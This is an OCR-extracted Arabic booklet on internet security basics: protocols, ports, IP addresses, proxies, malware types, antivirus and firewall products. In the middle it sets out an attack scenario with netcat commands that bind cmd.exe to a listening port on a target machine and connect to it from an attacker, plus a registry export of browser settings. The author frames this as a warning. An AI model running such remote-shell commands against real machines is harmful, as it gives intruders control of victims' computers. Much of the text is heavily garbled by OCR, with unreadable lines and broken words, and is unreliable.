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الدروع الأمنية فى الأنترنت 


خير الكلام ما قل ودل .. نعم هذا المثل ينطبق على هذا البحث فلم اشأ أن اجعل 
طائل منھا سوی الصداع والخروج أحيانا بدون فائدة .قد قسمت البحث على اأنحو 
التالئ 1 

في الجزئية الأولى منه تكلمت عن المصطلحات سواء المتعلقة بالإنترنت أو المتعلقة 
ماهية الاختراق والإشارة إليه دون تفصيل وحتى أزيل بعض من المفاهيم الناقصة 
بعد ذلك الحديث عن حماية مستخدم الإنترنت والبرامج المستخدمة في الحماية 
كکمضادات الفيروسات أو الجدران النارية › بعد ذلك 

انتقلت للحديث عن حماية البرامج المتعلقة بالإنترنت كالمنتديات وا؟لات 
والسكربتات متناولا أمثلة عليها وطرق الهجوم والحماية 

المصطلحات الأساسية ٠‏ 

الإنترنت : 

عبارة عن مجمو عة من الأجهزة الحاسوبية متصلة ببعضها البعض > و هده الأجهزة 
تتخاطب باستخدام لغة معينه مثلنا يا بني البشر إلا أن 

هذه اللغة تسمی برتوکولات 

البروتوكولات : 

ق الطبع و التوزب محفوظة للمؤّلف للأتصال : 
mushtaq_talib58@yahoo.com‏ 


ل 


/ 


(€ 


€ 


mushtaqg talib @yahoo.com 
2011 


و اکر ارک ت کے تک 
الأجهزة متصلة ببعضها هو بروتوكول تي سي بي / أي 


أي بروتوكول التحكم في نقل البيانات والمعلومات الخاصة بالإنترنت . أي أن 
البروتوكولات هي القواعد أو الاتفاقات 1٤٥۲/۱۴‏ بي أو 


التي تستخدمها جميع الشبكات المتصلة ببعضها البعض . 


وهو البرتوكول المعني بنقل البیانات بين جهازین طبعا يوجد ۴۲۴ توجد العديد من 
البروتوكولات ومن اشهرها برتوكول نقل الملفات 


تفاصيل دقيقة في نفس البرتوكول .. فعندما تريد نقل ملف من جهازك إلى جهاز 
أخر على شبكة الإنترنت فأنت تستخدم هذا 


البروتوكول ..سأورد مثالا يوضح لك هذا المفهوم لكن بعد قليل 


أو خدمة البريد لاحظ أحیانا ۴۳۴ كلها أسماء لشي واحد وهو جهاز كمبيوتر تتوفر 
غه م ع مر اغات ل ك قل ات 


أن البروتوكولات ذكرت هنا كخدمات يقوم العميل - المستخدم - أو الزائر بطلبها 
المنفذ أو البورت 

بابسط المفاهيم كل خدمة لابد أن يكون لها منفذ فمثلا خدمة نقل البيانات تكون على 
المنفذ ۲١‏ وخدمة التصفح تكون عادة على 

المنفذ ۸۰ أو ۸٠۰۸٠‏ 


addres‏ | العنوان أو 


كل جهاز متصل بالإنترنت له عنوان مثل المعرف الشخصي للهوية ءففي عالم 
الإنترنت يستحيل أن يتكرر هذا العنوان وقد يكون هذا 
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وقد يكون هذا العنوان مں-اه0i‏ العنوان متغير في كل مره في حالة كونك تتصل 
عن طريق مزود خدمة وتستخدم اتصال من نوع 


أو في حالة الخط المؤجر . والعنوان يكون بمثابة دليل ومعرف عليك داخل 
الإنترنت وتكون 051 ثابت في حالة الاتصال من نوع 


صيغة الايبي أو العنوان كالتالي : 


4/۱۸ 
فمتثلا مکان الاكسات نضع أرقام وكذلك في باقي الحروف وحتى اقرب الصورة 
لذهنك فالايبي يكون : €€ع.222.⁄¥⁄.××× 


٥°‏ ولمعرفة عنوانك أو رقم الايبي اكتب الأمر التالي في موجه 
الاه کس ستعرف موجه الأوامر - لاحقا 


ipconfig (‏ ثم الأمر - command or cmd‏ - ولكتابة الأمر السابق ( اختر ابدا 
تشغیل ip conf.‏ 


Web Server‏ ملقم الوب 

عبارة عن برنامج يتلقى طلبات من المستخدمين قد تكون هذه الطلبات صفحات أو 
serve٣‏ vaهز‏ وسیرفر جافا ۱5| وسیرفر مایکرو سوفت الشھیر ٤٣٥‏ ھم۸ سیرفر 
الاباتشي 

نظام الد فیا : 


عبارة عن كيان متكامل وابسط المفاهيم ألا مثله للشرح مثل نظام ويندوز بجميع 
النسخ ونظام لينوكس بجميع توزيعاته ونظام 


ماکنتوش. 
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هو برنامج تستخدمه لمشاهدة صفحات الوب وقد يكون لدى هذا المستعرض القدرة 


ومن أمثلة المستعرضات الإنترنت اكسبلورر والنت سكيب . ۴۲۲ التطبيق كيفية 
التعامل مع بروتوكولات الإنترنت المختلفة مثل 


( sەokiەc)‏ الکوکیز 


ملفات يضعها موقع ما في جهاز المستخدم بغرض التسهيل على المستخدم أو 
لأغراض تختلف بحسب الأهداف من وضعها . 


قد تحتوي الملفات هذه على معلومات حساسة مثل أسماء وكلمات مرور أو أرقام 
بطاقات ائتمانية ..الخ . 
Script (‏ ) السكربت 


ER1‏ أو A5۴‏ أو مم نص برمجي مكتوب بلغة برمجيه قد تکون موجهه نحو 
الوت ار الق فت مل اة افا سكريت آر 


ويحتاج بذلك لملقم إنترنت . أو قد يكون نص برمجي تم برمجته وموجه للعمل على 
الجهاز المحلي مثل الملفات الدفعية . 


٥×‏ البروكسي أو المفوض أو الوكيل الملقم أو 


هناك تصور مغلوط أو ناقص عند الكثير من مستخدمي الإنترنت حول مفهوم 
خلاله دخول المواقع أو يسمح لك بالوصول إلى المواقع الغير مسموح ؟| عن طريق 
مزود الخدمة أو الشركة التي تقدم الاتصال لك 


»هذا الكلام ناقص» حيث أن البروكسي هنا خاص بالويب بمعنى أخر خاص 
شحاف فط هنات العف من ال وكساك مص 
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لخدمات أخرى غير خدمات جلب الصفحات قد تجد بروكسي خاص لبرامج 
المحادثات .. الخ . الغرض من البروكسيات هو الخدمة 


السريعة للمستخدم وليس إساءة استخدامها بمعنى إ؟| تلعب دور مخزن للبيانات فلو 
كان لدينا شركة تقدم خدمة الإنترنت لعملائها 


فإ؟! بالكاد تأمن لهم بروكسي للتصفح وبروكسي لتتريل الملفات ..الخ فلو طلب احد 
عملائها موقع الياهو فسيحتفظ البروكسي 


بالموقع في ذاكرته ولو طلب عميل أخر لنفس الشركة هذا الموقع فسيكون متوفر 
في ذاكرة البروكسي بذلك يكون الطلب من 


البروكسي أسرع . 
1 
o/ 1۸‏ 


بعد هذا التقديم البسيط للمصطلحات المهمة والخاصة بالإنترنت سأورد مثالا كما 
وعدتك سابقا يجمع هذه المصطلحات لأني اعرف أن 

المثال سيزيل الغموض أو تداخل المفاهيم لنفرض إني أريد تحميل ملفات إلى موقع 
انترنت أو أريد تتريل ملفات من موقع انترنت »فهل 

بالطبع الإجابة على سؤالك لا. لان هناك برامج تقوم ؟ذا الشي متل ؟ ۴۲۲ يعني 
أنى سأحتاج كل تفاصيل البرتوكول الخاصة ب 


هذا البرنامج تقوم بتنصيبه - تركيبه - على جهازك وبعد ذلك ستختار اسم الموقع 
المراد تحمیل الملفات إلیه أو ۷5_۴۳۴ برنامج 


تحميلها من »في بعض الأحيان تحتاج إلى اسم مستخدم و كلمة مرور لأن هذه 
الخدمة قد لا تكون مجانية في كثير من الأحيان . هنا 
ماذا لو أردت أن استخدم برتوكول أخر أو خدمة أخرى ؟.بالطبع الإجابة ستكون 
انلك بحاجة ۴۲۲ تكلمت عن خدمة أو برتوكول 
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لبرنامج خاص "ذه الخدمة . ولكن من أين لي ؟ذا البرنامج ؟ هناك برامج قد تكون 
مضمنه مع نظام التشغيل وندوز فلو أردت نفس 


الذي يأتي مع الوندوز ولكن هذا البرنامج لا يدعم الواجهة الرسومية بمعنى انك 
ستعمل في ۴۲۳۴ الخدمة السابقة قد تستخدم برنامج 

سطر الأوامر أو الشل - قد يأتي الحديث لاحقا عن سطر الأوامر - . ( اسم البرنامج 
هنا نفس اسم البرتوكول - للتنويه - ) 

ومن الخدمات الأخرى مثلا : خدمة البريد الإلكتروني تحتاج هذه إلى برامج خاصة 
سواء من شركة مايكروسوفت أو غيرها ومن 

كلها تفي بنفس الغرض وهو هاه لںع وهناك برنامج أخر من شركة أخرى 
Expres‏ ookاut‏ البرامج التي تأتي من مایکروسوفت 

استقبال البريد وإرساله . 

ماذا لو أردت الاستمتاع بخدمة الوب الخاصة بتصفح المواقع طبعا ستكون الإجابة 
دعني أورد لك مثالا عن كيفية تصفح موقع الياهو باستخدام |٤‏ أو اختصارا 
Explorer‏ مایکروسوفت وهو الإنترنت ١‏ کسبلورر 

القاعدة الأساسية لااستخدام أي برتوكول داخل برنامج التصفح أو الاكسبلورر 
Http://www.Yahoo.com:80‏ 

Protocol : Hostname : Port 

اسم البرتوكول وهو هنا 

HTTP 


۴۲ من الممکن ان يکون 
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۴P‏ البرتوکول سواء 

الخ .. ۴۲ او 

تقطتان الفضل بین اسم الموقع والبرتوکول 
اسم الموقع او المستضيف 

قد یکون مسبو قا ب// 

دلالة على انه موقع 

خارجي 

هذا المنفذ وهو اختياري لأن 
المتصفح يتعرف على 

البروتوكول والمنفذ تلقائي 

اشارة الى انه 

خارج llئجjl www.yahoo.com‏ 
كلها اشارة الى اسم الموقع 


رقم المنفذ وهو اختياري 


٦/۱۸ 

يجب أن تعرف أشياء حول الرسم التوضيحي السابق : 

۴۲ أو 1۲۲۴ البروتوكول : وسبق شرحه من الممكن أن يكون 

الخ .. عه أو عم أو ۳ء الهوست نيم : وهو اسم المضيف قد يكون اسم الموقع 
يحمل اللاحقة 
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المنفذ أو البورت : وهو اختياري بمعنى من الممكن التغاضي عنه 


تجدر الإشارة إلى أن المستعرض أو الاكسبلورر يحتوي على ميزة التعرف 
البروتوكول ومن الممكن أن يتعامل على انه برنامج لتحميل 


وتتريل الملفات لكن ليس بكفاءة تلك البرامج المتخصصة للتعامل مع البروتوكول 
الخاص . فيما تبقى من المصطلحات سأتحدث - 


انشاء الله - عن المصطلحات المتعلقة بالأمن والحماية جهة الملقم أو السيرفر : 


۷/۱۸ 
هذا الباب معنيبحماية الجهاز من الفيروسات وحماية بيانات المستخدم 


۸/۱۸ 


اخي القارئ اختي القارئة ..اخي المستخدم اختي المستخدمة لجهاز الحاسوب لابد 
انك سمعت عن اسحاق نيوتن أو مر عليك أثناء 


دراستك » ولابد انك سمعت بتفاحته الشهيرة وسقوطها لاشك حينما سقطت تلك 


التفاحة ..سقطت التفاحة الا هذا الرجل سأل لماذا سقطت التفاحة ؟ 


هذا بالفعل يرتبط بالحاسوب فهل لك أن تسأل لماذا اخترق جهازك ؟ لماذا سرقت 
بياناتك او خربت من العابثين ؟ لا ..لا 
بياناتك من هؤلاء ؟ ربما کلامي هنا يسري على 
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الك العادى الاي ايك أا اال ار ت ا ارت إن امین اكا 
عاتبا عليك لكن اريد ان ينضج بك التفكير وتعي 


بأن العالم لم يعد صغيرا وقد تكثر الذئاب المفترسة والطيور الجارحة في هذا العالم 
. لكن من اين بدء الهجوم عليك ؟ انتظر ! وتامل 

الفايروسات والتروجانات والباتشات والباكدور او الباب الخلفي والكي لوجر : 

هده الاسماءِ تشترك في هدی او اهداف واحدة وهو انتهاك الخصوصية وتخريب 
الجهاز وسرقة المعلومات الحساسة من جهازك والتميز 

بينها يكون من ناحية الاهداف .فالفايروس برنامج يؤذي الجهاز بحيث يسبب تلف 
للبيانات او قطع الجهاز مثل فايروس تشرنوبل . لن 

البساطة والتسهيل . التروجان او الباتش اوالباب خلفي 


أو حصان طروادة عبارة عن برنامج يسمح للهكر او المخرب بالتحكم عن بعد 
E NT TE‏ 


ا ل اتر ال ف ب ار تت تا يرتا الس سى 
والاوبتيكس وغيرها من البرامج تدخل في هذا المسمى 


. الكي لوجر او لاقط ضربات المفاتيح عبارة عن برنامج فهو برنامج يقوم بتسجيل 
O Ty.‏ 


ويقوم بأرساله الى المخرب .من الممكن ان تقوم قطع يتم تركيبها على الجهاز تقوم 
ذا العمل و تعمل ينف الكفاءة. 


برامج مكافحة الفيروسات والجداران النارية وبرامج تتبع الرزم وبرامج المراقبة 


هي عبارة عن برامج يتم تركيبها على الجهاز ولهذه البرامج قواعد بيانات خاصة 
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تواقيع او بصمة خاصة لكل فيروس بحيث تتم مقارنة أي برنامج موجود على 
الا سرا اا طا نالرت ار اقا غل 


ا ا ع و ا ر غ ی ق ات 
المستخدم بوجود الفايروس او برنامج التجسس بلقد اغفلت جوانب كثيرة منها 
اللقفر ١‏ اسالت الى عن ر تالقان ولل 

تجسس وهذا البرنامج يمتد تأثيره على نوعية معينة من 

ر بحيث يضيف شيفرة لدية في مكان الأ أتعليقات داخل البرامج نازعا صفة ا أخبث عنه 
بکونه یرید تغییر حجم تلك ٤×٤‏ الامتدادات مثل 


الملفات حتى لا تتمكن برامج مكافحة الفيروسات من كشفه . 


۹/۱۸ 
عبارة عن برنامج اخر للحماية والهدف منه التعرف على البرامج التي تتصل 
بالانترنت او على شبكة ||جWء۴¡r؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟‏ 


محلية والمنافذ التي تعمل عليها تلك البرامج بحيث يتسنى لك معرفة ومراقبة 
آلر امج و الاح او الرفض الك ارام :ف العي 


تلك البرامج - الجدار الناري - دورا مهما في صد أي هجوم عليك مثل عمليات 


ت مك ات ل ك 


ربما هذه النوعية متقدمة في الحماية وهي تساعد المستخدم المحترف أن يتتبع 
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يتصل بالانترنت او بشبكة واسعة لمعرفة الجهات التي تنتقل لها الرزم او حزم 
البيانات من حيث الحجم والمكان وللتنويه هذه تختلف عن 


تعقب مرور البيانات في الانترنت عن طريق اعطاء امر راوتر للتبع سير بيانات 
يتصل بالانترنت .لنقل على سبيل المثال والتوضيح برنامج المسنجر. للتبع ذهاب 
الرزم من جهازك الى موقع البرنامج الاساسي فلو 
وجدت ان هناك اتصال بسيرفر اخر اثناء تتبعك لسير البيانات فأعلم للتو واللحظة 
بأنك تستخدم برنامج مشبوه يمرر البيانات المرسلة 


من جهازك الى الجهة التي تتجسس عليك ! لا اريد الاطالة لأن التفاصيل ستجعل 
مك افسانا فکاکا فی کل ما يون بخهارك . 


تسمى هذه البرامج المونيتر ومنها انواع مختلفة فقد يقوم بعضها بمراقبة تنفيذ 
برنامج معین حيث تتعرف علی EEERERRREBBRE‏ 

الموجدة في التطبيق او الموجودة داخل نظام وندوز ا01 الاشياء التي تجري من 
كلف الكو اليس آثاء تتف البرنامج مثل طالب الدوال 

اما بعضها يستخدم في مراقبة تنفيذ البرامج على الرجستري الخاص بالوندوز 
وتسمی في هذه ۴|١ "٤0۲‏ وتسمى في هذه الحالة ب 

Registry Monitor .‏ الحالة ب 


IIAIIIDILLLLLLIOLLAKSSLLLLLILIOLLAKKSKKLLLLLLKAKKKSKKSLLLLKKKEKKKSSLLLL, 


Swiss Ar my Knife‏ سكينة الجيش السويسري او 
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معروفة ؟ذا الاسم في اوساط الحماية ولدى المخربين ايضا .. 


ربما ترجع التسمية ولست متأكد من ذلك الى كون الجيش السويسري اعتمد اداة مع 
جنوده بحيث تعمل اشياء عديدة مثل سكين 


هذا البرنامج يعمل على منصتي الوندوز واللينوكس . هذه الاداة تعمل على أي منفذ 
يتم اعدادہ من Ne†C٥Cat‏ او nc‏ الاسم الدارج لها 
قبل المهاجم وتعطيه تحكما اكثر بحيث يستطيع تشغيل مايشاء من البرامج وتنفيذها . 
ستعرف الغرض من ذكري لها هنا لاحقا لاني 


سنأورد مٹالا عنها لكن مع مجموعة ادوات اخرى ولكن هنا مدخل للتعريف ؟ذه 
الاداة . 


۰/۱۸ 


ا00 C001‏ istr۷هR‏ الریجستري والاداة 


الريجستري او مسجل الوندوز عبارة عن مكان في الوندوز يسجل فيه كل شيء عن 
جهازك من قطع وبرامج وبيانات عن البرامج 


وکال ةا رزيرف ان ي هد ا ا من اد 
مایکروسوفت 


SEY‏ الاداة ريجستري كنسول توول عبارة عن برنامج يستخدم لإدارة ملفات وقيم 


IIIIIIILLLLLLLLLLEKKKASSSSLLLKIKAKKKKSKSLLLLKKLAKKKSSLLLLLLKLKKKSKKKLL, 
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را اترتا عار عن ما ن الككد ر ا ال اعا مطح الل ف 
یو نیکس او لینوکس فیر ادف ٣2٣ d-ئsط ٥|‏ ٣ہع‏ شل 


سطر اوامر او الكوماند شل على نظام التشغيل وندوز وتستطيع تشغيل سطر 


في كل من الوندوز واللينوكس او اليونكس تغيب الواجهه الرسومية والصورة ادناه 
للشل او سطر الاوامر او الكوماند شل تحت نظام 


من داخل سطر الأوامر : ةوه" التشغيل وندوز اكس بي وقد نفذت الامر 
لطا دو الراك العرة 

win 9x-wİinM€(‏ بالنسبة ل ) ٣2٣۹d‏ تع ابدأ ۔۔۔ تشغیل ۔۔۔ تم کتابة 
win XP - win N1(‏ بالنسبة ل ) ]"d‏ ابدا ۔۔۔تشغیل ۔۔۔ثم کتابة 

النظا فو الواحه الازية 

( start ---Run ---command ( For win9x -winME 


( Start ---Run--- Cmd ( For win XP — winNT 


قد تتعجب من ذكري لهاتين الاداتين هنا سكينة الجيش السويسري + الرجيستري 
كنسول ! لقد ذكر؟ما لاني احببت ان اريك 


خطور؟ما لو تم استخدامهما معا على نظامك او جهازك . فقد ترددت کثیرا حینما 
فكرت ان اطرح هذا لخوفي من ضعاف النفوس ان 
تسول لهم انفسهم استغلالهما ويقع ما كنت اخشاه من اساءة هذا الكتاب ولكن كون 
الدين الاسلامي اختار الوسطية فقد قررت ان 
قوق الطبع و التوزيع محفوظة للمؤلف للأتصال : 
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اميل الى الوسطية في الشرح وعدم الاسهاب في ذلك . 

لنفرض وصول هاتين الاداتين او البرنامجين الى نظامك بالاسلوب التالي :- 

- برنامجان ممتازان غنيان عن التعريف .. الخ 

- ان كنت تشكي من بطء الاتصال فاليك هذين البرنامجين ضعهما في ا؟لد سيستم 


- هل تريد ان تحصل على امتياز اكثر في برنامج المحادثات المسنجر او تتجسس 
على من معك في القائمة وتعرف الكثير عنه 

- هل تريد الدخول متخفيا في برنامج المحادثات البال توك او تحصل على امتيازات 
مدير الغرفه او تلغي حالة الطرد 


- هل تريد ان يعمل جهازك من البيت وانت في العمل او المدرسة او الجامعة 
وده لك احا السو ال الكامن من اسه اليا 


او امتحان مادة الرياضيات في الجامعة ويرسل الاجابات عبر الأثير ( طبعا السطر 
الأخير للدعابه والترويح عنك ) لكن قد يحدث 


ما سبق ؟ذه الصورة او بصورة مشا؟ة لها. فالعبرة بوصولهما لجهازك . 

قد يتمكن المخرب بصوره احترافية بانشاء ملف دفعي يحتوي تفعيل الاوامر التالية 
للبرنامجين وقد يتمكن من الاتصال من جهازك بجهاز 

او غيرها وتحميل الملفات من والى جهازك وقد يكون الامر اكثر شراسة بحذف 
۴۴۶۲ او ۴۲۲۴ اخر على الانترنت سواء بواسطة خدمة 

الملفات من جهازك او سرقة البيانات من جهاز وتحديدا من الرجستري او وضع 
باتش او كي لوجر في جهازك تخيل انك عصفور برئ 


عم اليك اوامر البرنامج النت كات 
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لإعداد البرنامج بحيث يكون في حالة منصته على الجهاز الهدف ( هذا الامر ينفذ 
من نفس الجهاز المراد الاستماع اليه ) او بواسطة 


الملف الدفعي . لنفرض الرغبة بالاستماع الى المنفذ ٥۸١۹‏ او من الجائز استخدام 
منفذ اخر مٿثل ۸۰۸۰0 او ۰ .الخ 


للأتصال بالجهاز الهدف نتبع التالي من سطر الاوامر ( من جهاز المهاجم ): 


بعد تنفيذ الأمر السابق ستجد ان الشل او سطر الاوامر لدى الجهاز البعيد انتقل اليك 
تخل ب وا ما ست لى ال دلت 


بالائال سر فر آخر من جهارك وتريل لفات إو رفا ١‏ هنا ماقا 
السيناريو لكن اترك لك الخيال لتتخيل ما يحل بك ! 


: اوامر البرنامج رجستري كنسول‎ 
C:\nc -L —d - e cmd.exe— p 5859 


C:\nc 10.10.10.34 5859 


۲/۱۸ 


اك اليد من الا اس ركن تكاج الى قم كام قات الرجتري رالات 
على الجهاز الهدف على افتراض ان الملف التشغلي ».٥ءء‏ قيمة مفتاح يحتوي 
على اعدادت الاكسبلور الى ملف خارجي بالأسم 

وموجود على القرص الصلب سي لدى الجهاز الهدف : م×ه.عهR‏ للرجستري 
کنسول بالإسم 


لأحظ اسك امي اعادمات اللنصصض لأن المفثاح انئرنت اكساررو بترئ علي 
فراغ بين انترنت و كلمة اكسبلورر فلو لم يكن هذا 
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الفارغ موجدا كان استعمال الامر بدون علامتي التنصيص . والقيم التي اعادها لي 
هي : 


بعد هذا الكلام ..اود الإشارة لشيء مهم وهو أن الاداتين السابقتين من الادوات 
الممتازة على ادارة الشبكة لاني بالفعل استخدمهما 


في ادارة الاجهزه المترلية والشبكة ولكن اساءة استخدامهما جعلتهما سيئتي السمعة 
بسبب استخدامهما في عملية الاختراق . قد 


تستغرب ذكري لهما با؟ما مفيدتان وهما مضرتان (فكل انسان يرى الناس بعين 
طبعه ).ريبما عشقي للكنسول او الشل ارتبط بحب 


وغيرها . ”اه ه8 هاتين الاداتين بالرغم من توافر ادوات رسومية مثل 
هناك اشياءكثيرة يلجا له المخترق في اقتحام عالمك وخصوصيتك ربما عن طريق 
المستعرض باستغلال احد الثغرات الموجوده فيه 


وقد يستطيع المخترق دمج باتش او فايروس او Uploader‏ او downloader‏ 
ی ی و ا 


C:\reg export “ 
HKEY_CURRENT_USER\Software\Microsoft\Internet 
Explorer\Main” ieset.txt 


Windows Registry Editor Version 5.00 


HKEY_CURRENT_USER\Software\Microsoft\Internet ] 
[Explorer\Main 


NoUpdateCheck"=dword:O00000001" 
NoJITSetup"=dword:O00000001" 


"Disable Script Debugger"="yes" 
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"Show_ChannelBand"="No" 


"Anchor Underline"="yes" 


"Cache_Update_Frequency"="Once_Per_Session" 


"Display Inline Images"="yes" 
Do404Search"=hex:01,00,00,00" 


"Local Page"="C:\\WINDOWS\\System32\\blank.htm" 


"Save_Session_History_On_Exit"="no" 
"Show_FullURL"="no" 


"Show_StatusBar"="yes"™ 


"Show_ToolBar"="yes" 
"Show_URLinStatusBar"="yes" 
"Show_URLToolBar"="yes" 


"Start Page"="about:blank" 


"Use_DlgBox_Colors"="yes" 


Search " 
Page"="http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=ie 
"search 


"FullScreen"="no" 


بع و 
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Window_Placement"=hex:2c,00,00,00,02,00,00,00,03,00,00,00, 
\<00,83,ff,ff,00,83 


ff,ff,ff,ff,ff,ff, ff, ff, FF, FF,00,00,00,00,00,00,00,00,20,03,00,00,3ے2,0‎ 
\2,00 


^ 


Use FormSuggest"="no" Windows Registry Editor Version 5.00" 


۳/۱۸ 

... الخ داخل صفحة انترنت مستغلا ثغره في برنامج التصفح لديك فالبرامج تنوعت 
أي لم يعد الامر مقتصر على تلك التي ترسل 

بالبريد او من خلال برامج المحادتثات بل من الممكن ارسال البرامج ايضا عن 
طريق الصفحات كما ذكرت سابقا . 

لن اتكلم عن كيفية عمل هذه البرامج فهي فقط ترسل الباتشات او غيرها عن طريق 
المستعرض او بالاحرى عن طريق صفحات 

الانترنت .وللتغلب على متل هذه الحالة عليك بتحديث المستعرض او المتصفح لديك 
من خلال الشركة الخاصة على الارجح ١؟ا‏ 

مايكروسوفت »ان كنت كسول لا تحب متابعة التحديتات فانت تتحمل هذا الشيء 
وحتى اقلل نسبة الكسل هذه حاول ان تقوم 

لاني أكاد اجزم بان المستخدمين في البلدان العربية 

او اختر ٣.٥٠×٥‏ ع4۳ مںس يهتمون بالتصفح وبرامج المحادثات وقلة يهتم بتحديث 
شامل للنظام . وللقيام ؟ذا اكتب الامر التالي في تشغيل 

و التوزيع محفوظة للمؤلف للأتصال : 
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مایکروسوفت .کان بوسعي ذکر teھ‏ لمل Ws‏ لہا۷ ابد ثم زر 


العند من اة عن طرق واسالت الحرم لگن فعلت الاشارة نا درن التمق 
في تفاصيلها .بقيت جزئية ساتركها لبرامج الحماية 


وللجدار الناري لا؟ما هما ثمرة هذا الباب وما يحتاجه المستخدم من الحماية على 
جهازه ولن افضل برنامج على اخر لأن لكل برنامج ما 

يميزه عن غيره وكذلك الامر بالنسبة للجدار الناري .طبعا ساتناول الاشهر من 
كلاهما وليس كل البرامج ولن اتكلم عن طريقة 


اعدادهم لأ؟| تقريبا منتشرة في الانترنت . 


۱۸ 

Norton Anti-Virus‏ اسم البرنامج : النورتن انتي فایروس 
النوع : برنامج مكافحة فيروسات 

http://www .symantec.com‏ : موقع الشركة 

التنبيه الذي اظهره البرنامج عندما حصل على برنامج تجسس 
والاجراء الذي تعامل تم s‏ ں۲6٥"‏ واسمه ومکان تواجده وهو 


لخادو هى الف 


10/1۸ 
او كما يسميه البعض الكييف ۷)؟۲ عمج اسم البرنامج : كاسبر سكاي 
النوع :برنامج مكافحة فايروسات 
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http://www .kaspersky.com‏ : الشركة 

ملاحظة: هذا البرنامج به من الميزات ما يجعله يتصدر برامج الحماية . انتهى 
مكان ملف التجسس أو 

الفيروس 

نوع الملف العدواني في 

فة الحا اكور 


الإجراء المتخذ في حقه 


۱/۱۸ 

ااةس ١۲ا۴‏ الجدار الناري 

Zone Aler mM‏ اسم البرنامج : الزون الارم 
النوع : برنامج جداري ناري 
http://www .zonelab.com‏ : الشركة 
تنبيه يفيد بان برنامج المسنجر 

یرغب بالاتصال بالانترنت ورقم 

الف حه الاتصال وأضدارة 

البرتامج 

واجهة البرنامج 

تفيد بان برنامج المسنجر يرغب بان يعمل 
کسر قر ها قحال ارسال ملف اد 
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الرغبة بالمحادثه الصوتية او في اثناء تشغيل 


الفيديو - الكاميرا - 


۱۷/۱۸ 

rmor2N€t‏ : اسم البرنامج 

النوع : جدار ناري 

http://w w.ar mor 2net.com‏ : الشركة 

تنبيه يفيد بان برنامج البال توك يرغب بالاتصال واجهة البرنامج 


بالانترنت ولك الخيار في السماح او عدمه 


۱۸/۱۸ 

KasperSky AntiHacker‏ : اسم البرنامج 
نوع البرنامج : جدار ناري 
http://www .kaspersky.com‏ : الشركة 
البرامج النشطة في الحالة 

الراهنة 

رامع الستهر افاء 

طفد الاتضال ااقت 

بالاضافة الى خيارات 


الجدار الناري 


+ 


mushtaq_talib58@yahoo.com 


ق ١‏ و التوزيع محفوظة للمؤلف للأتصال : 


2011 


ل 


/ 


€ 


mushtaqg talib @yahoo.com 
_1 


( 


